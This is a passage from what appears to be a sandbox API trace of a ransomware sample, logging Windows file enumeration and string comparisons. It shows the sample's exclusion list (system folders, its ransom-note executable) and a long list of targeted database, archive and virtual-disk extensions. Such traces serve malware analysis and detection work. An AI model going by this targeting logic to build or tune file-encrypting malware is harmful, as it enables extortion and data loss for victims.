hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.572] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.572] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.572] CloseHandle (hObject=0x15c) returned 1 [0092.572] CloseHandle (hObject=0x118) returned 1 [0092.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.573] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Tools", cAlternateFileName="SYSTEM~1")) returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="aoldtz.exe") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2=".") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="..") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="windows") returned -1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="bootmgr") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="temp") returned -1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="pagefile.sys") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="boot") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="ids.txt") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="ntuser.dat") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="perflogs") returned 1 [0092.573] lstrcmpiW (lpString1="System Tools", lpString2="MSBuild") returned 1 [0092.573] lstrlenW (lpString="System Tools") returned 12 [0092.573] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\Run.lnk") returned 69 [0092.573] lstrcpyW (in: lpString1=0x2cce47c, lpString2="System Tools" | out: lpString1="System Tools") returned="System Tools" [0092.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a28 [0092.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x96) returned 0x335068 [0092.573] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a30 | out: ListHead=0x2e7710, ListEntry=0x2e7a30) returned 0x2e7a10 [0092.573] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7dfa026d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x4cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Explorer.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0092.573] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.573] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="aoldtz.exe") returned 1 [0092.573] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".") returned 1 [0092.573] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="..") returned 1 [0092.573] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="windows") returned 1 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="bootmgr") returned 1 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="temp") returned 1 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="pagefile.sys") returned 1 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="boot") returned 1 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ids.txt") returned 1 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="ntuser.dat") returned 1 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="perflogs") returned 1 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2="MSBuild") returned 1 [0092.574] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0092.574] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools") returned 74 [0092.574] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Windows Explorer.lnk" | out: lpString1="Windows Explorer.lnk") returned="Windows Explorer.lnk" [0092.574] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0092.574] lstrlenW (lpString="Ares865") returned 7 [0092.574] lstrcmpiW (lpString1="rer.lnk", lpString2="Ares865") returned 1 [0092.574] lstrlenW (lpString=".dll") returned 4 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".dll") returned 1 [0092.574] lstrlenW (lpString=".lnk") returned 4 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".lnk") returned 1 [0092.574] lstrlenW (lpString=".ini") returned 4 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".ini") returned 1 [0092.574] lstrlenW (lpString=".sys") returned 4 [0092.574] lstrcmpiW (lpString1="Windows Explorer.lnk", lpString2=".sys") returned 1 [0092.574] lstrlenW (lpString="Windows Explorer.lnk") returned 20 [0092.574] lstrlenW (lpString="bak") returned 3 [0092.574] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.574] lstrlenW (lpString="ba_") returned 3 [0092.574] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.574] lstrlenW (lpString="dbb") returned 3 [0092.574] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.574] lstrlenW (lpString="vmdk") returned 4 [0092.574] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.574] lstrlenW (lpString="rar") returned 3 [0092.574] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.574] lstrlenW (lpString="zip") returned 3 [0092.574] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.574] lstrlenW (lpString="tgz") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.575] lstrlenW (lpString="vbox") returned 4 [0092.575] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.575] lstrlenW (lpString="vdi") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.575] lstrlenW (lpString="vhd") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.575] lstrlenW (lpString="vhdx") returned 4 [0092.575] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.575] lstrlenW (lpString="avhd") returned 4 [0092.575] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.575] lstrlenW (lpString="db") returned 2 [0092.575] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.575] lstrlenW (lpString="db2") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.575] lstrlenW (lpString="db3") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.575] lstrlenW (lpString="dbf") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.575] lstrlenW (lpString="mdf") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.575] lstrlenW (lpString="mdb") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.575] lstrlenW (lpString="sql") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.575] lstrlenW (lpString="sqlite") returned 6 [0092.575] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0092.575] lstrlenW (lpString="sqlite3") returned 7 [0092.575] lstrcmpiW (lpString1="rer.lnk", lpString2="sqlite3") returned -1 [0092.575] lstrlenW (lpString="sqlitedb") returned 8 [0092.575] lstrcmpiW (lpString1="orer.lnk", lpString2="sqlitedb") returned -1 [0092.575] lstrlenW (lpString="xml") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.575] lstrlenW (lpString="$er") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.575] lstrlenW (lpString="4dd") returned 3 [0092.575] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.575] lstrlenW (lpString="4dl") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.576] lstrlenW (lpString="^^^") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.576] lstrlenW (lpString="abs") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.576] lstrlenW (lpString="abx") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.576] lstrlenW (lpString="accdb") returned 5 [0092.576] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0092.576] lstrlenW (lpString="accdc") returned 5 [0092.576] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0092.576] lstrlenW (lpString="accde") returned 5 [0092.576] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0092.576] lstrlenW (lpString="accdr") returned 5 [0092.576] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0092.576] lstrlenW (lpString="accdt") returned 5 [0092.576] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0092.576] lstrlenW (lpString="accdw") returned 5 [0092.576] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0092.576] lstrlenW (lpString="accft") returned 5 [0092.576] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0092.576] lstrlenW (lpString="adb") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.576] lstrlenW (lpString="adb") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.576] lstrlenW (lpString="ade") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.576] lstrlenW (lpString="adf") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.576] lstrlenW (lpString="adn") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.576] lstrlenW (lpString="adp") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.576] lstrlenW (lpString="alf") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.576] lstrlenW (lpString="ask") returned 3 [0092.576] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.576] lstrlenW (lpString="btr") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.577] lstrlenW (lpString="cat") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.577] lstrlenW (lpString="cdb") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.577] lstrlenW (lpString="ckp") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.577] lstrlenW (lpString="cma") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.577] lstrlenW (lpString="cpd") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.577] lstrlenW (lpString="dacpac") returned 6 [0092.577] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0092.577] lstrlenW (lpString="dad") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.577] lstrlenW (lpString="dadiagrams") returned 10 [0092.577] lstrcmpiW (lpString1="plorer.lnk", lpString2="dadiagrams") returned 1 [0092.577] lstrlenW (lpString="daschema") returned 8 [0092.577] lstrcmpiW (lpString1="orer.lnk", lpString2="daschema") returned 1 [0092.577] lstrlenW (lpString="db-journal") returned 10 [0092.577] lstrcmpiW (lpString1="plorer.lnk", lpString2="db-journal") returned 1 [0092.577] lstrlenW (lpString="db-shm") returned 6 [0092.577] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0092.577] lstrlenW (lpString="db-wal") returned 6 [0092.577] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0092.577] lstrlenW (lpString="dbc") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.577] lstrlenW (lpString="dbs") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.577] lstrlenW (lpString="dbt") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.577] lstrlenW (lpString="dbv") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.577] lstrlenW (lpString="dbx") returned 3 [0092.577] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.577] lstrlenW (lpString="dcb") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.578] lstrlenW (lpString="dct") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.578] lstrlenW (lpString="dcx") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.578] lstrlenW (lpString="ddl") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.578] lstrlenW (lpString="dlis") returned 4 [0092.578] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.578] lstrlenW (lpString="dp1") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.578] lstrlenW (lpString="dqy") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.578] lstrlenW (lpString="dsk") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.578] lstrlenW (lpString="dsn") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.578] lstrlenW (lpString="dtsx") returned 4 [0092.578] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.578] lstrlenW (lpString="dxl") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.578] lstrlenW (lpString="eco") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.578] lstrlenW (lpString="ecx") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.578] lstrlenW (lpString="edb") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.578] lstrlenW (lpString="epim") returned 4 [0092.578] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.578] lstrlenW (lpString="fcd") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.578] lstrlenW (lpString="fdb") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.578] lstrlenW (lpString="fic") returned 3 [0092.578] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.578] lstrlenW (lpString="flexolibrary") returned 12 [0092.578] lstrcmpiW (lpString1="Explorer.lnk", lpString2="flexolibrary") returned -1 [0092.579] lstrlenW (lpString="fm5") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.579] lstrlenW (lpString="fmp") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.579] lstrlenW (lpString="fmp12") returned 5 [0092.579] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0092.579] lstrlenW (lpString="fmpsl") returned 5 [0092.579] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0092.579] lstrlenW (lpString="fol") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.579] lstrlenW (lpString="fp3") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.579] lstrlenW (lpString="fp4") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.579] lstrlenW (lpString="fp5") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.579] lstrlenW (lpString="fp7") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.579] lstrlenW (lpString="fpt") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.579] lstrlenW (lpString="frm") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.579] lstrlenW (lpString="gdb") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.579] lstrlenW (lpString="gdb") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.579] lstrlenW (lpString="grdb") returned 4 [0092.579] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.579] lstrlenW (lpString="gwi") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.579] lstrlenW (lpString="hdb") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.579] lstrlenW (lpString="his") returned 3 [0092.579] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.579] lstrlenW (lpString="ib") returned 2 [0092.579] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.580] lstrlenW (lpString="idb") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.580] lstrlenW (lpString="ihx") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.580] lstrlenW (lpString="itdb") returned 4 [0092.580] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.580] lstrlenW (lpString="itw") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.580] lstrlenW (lpString="jet") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.580] lstrlenW (lpString="jtx") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.580] lstrlenW (lpString="kdb") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.580] lstrlenW (lpString="kexi") returned 4 [0092.580] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.580] lstrlenW (lpString="kexic") returned 5 [0092.580] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0092.580] lstrlenW (lpString="kexis") returned 5 [0092.580] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0092.580] lstrlenW (lpString="lgc") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.580] lstrlenW (lpString="lwx") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.580] lstrlenW (lpString="maf") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.580] lstrlenW (lpString="maq") returned 3 [0092.580] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.581] lstrlenW (lpString="mar") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.581] lstrlenW (lpString="marshal") returned 7 [0092.581] lstrcmpiW (lpString1="rer.lnk", lpString2="marshal") returned 1 [0092.581] lstrlenW (lpString="mas") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.581] lstrlenW (lpString="mav") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.581] lstrlenW (lpString="maw") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.581] lstrlenW (lpString="mdbhtml") returned 7 [0092.581] lstrcmpiW (lpString1="rer.lnk", lpString2="mdbhtml") returned 1 [0092.581] lstrlenW (lpString="mdn") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.581] lstrlenW (lpString="mdt") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.581] lstrlenW (lpString="mfd") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.581] lstrlenW (lpString="mpd") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.581] lstrlenW (lpString="mrg") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.581] lstrlenW (lpString="mud") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.581] lstrlenW (lpString="mwb") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.581] lstrlenW (lpString="myd") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.581] lstrlenW (lpString="ndf") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.581] lstrlenW (lpString="nnt") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.581] lstrlenW (lpString="nrmlib") returned 6 [0092.581] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0092.581] lstrlenW (lpString="ns2") returned 3 [0092.581] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.582] lstrlenW (lpString="ns3") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.582] lstrlenW (lpString="ns4") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.582] lstrlenW (lpString="nsf") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.582] lstrlenW (lpString="nv") returned 2 [0092.582] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.582] lstrlenW (lpString="nv2") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.582] lstrlenW (lpString="nwdb") returned 4 [0092.582] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.582] lstrlenW (lpString="nyf") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.582] lstrlenW (lpString="odb") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.582] lstrlenW (lpString="odb") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.582] lstrlenW (lpString="oqy") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.582] lstrlenW (lpString="ora") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.582] lstrlenW (lpString="orx") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.582] lstrlenW (lpString="owc") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.582] lstrlenW (lpString="p96") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.582] lstrlenW (lpString="p97") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.582] lstrlenW (lpString="pan") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.582] lstrlenW (lpString="pdb") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.582] lstrlenW (lpString="pdm") returned 3 [0092.582] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.583] lstrlenW (lpString="pnz") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.583] lstrlenW (lpString="qry") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.583] lstrlenW (lpString="qvd") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.583] lstrlenW (lpString="rbf") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.583] lstrlenW (lpString="rctd") returned 4 [0092.583] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.583] lstrlenW (lpString="rod") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.583] lstrlenW (lpString="rodx") returned 4 [0092.583] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.583] lstrlenW (lpString="rpd") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.583] lstrlenW (lpString="rsd") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.583] lstrlenW (lpString="sas7bdat") returned 8 [0092.583] lstrcmpiW (lpString1="orer.lnk", lpString2="sas7bdat") returned -1 [0092.583] lstrlenW (lpString="sbf") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.583] lstrlenW (lpString="scx") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.583] lstrlenW (lpString="sdb") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.583] lstrlenW (lpString="sdc") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.583] lstrlenW (lpString="sdf") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.583] lstrlenW (lpString="sis") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.583] lstrlenW (lpString="spq") returned 3 [0092.583] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.583] lstrlenW (lpString="te") returned 2 [0092.583] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.584] lstrlenW (lpString="teacher") returned 7 [0092.584] lstrcmpiW (lpString1="rer.lnk", lpString2="teacher") returned -1 [0092.584] lstrlenW (lpString="tmd") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.584] lstrlenW (lpString="tps") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.584] lstrlenW (lpString="trc") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.584] lstrlenW (lpString="trc") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.584] lstrlenW (lpString="trm") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.584] lstrlenW (lpString="udb") returned 3 [0092.584] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.584] lstrlenW (lpString="udl") returned 3 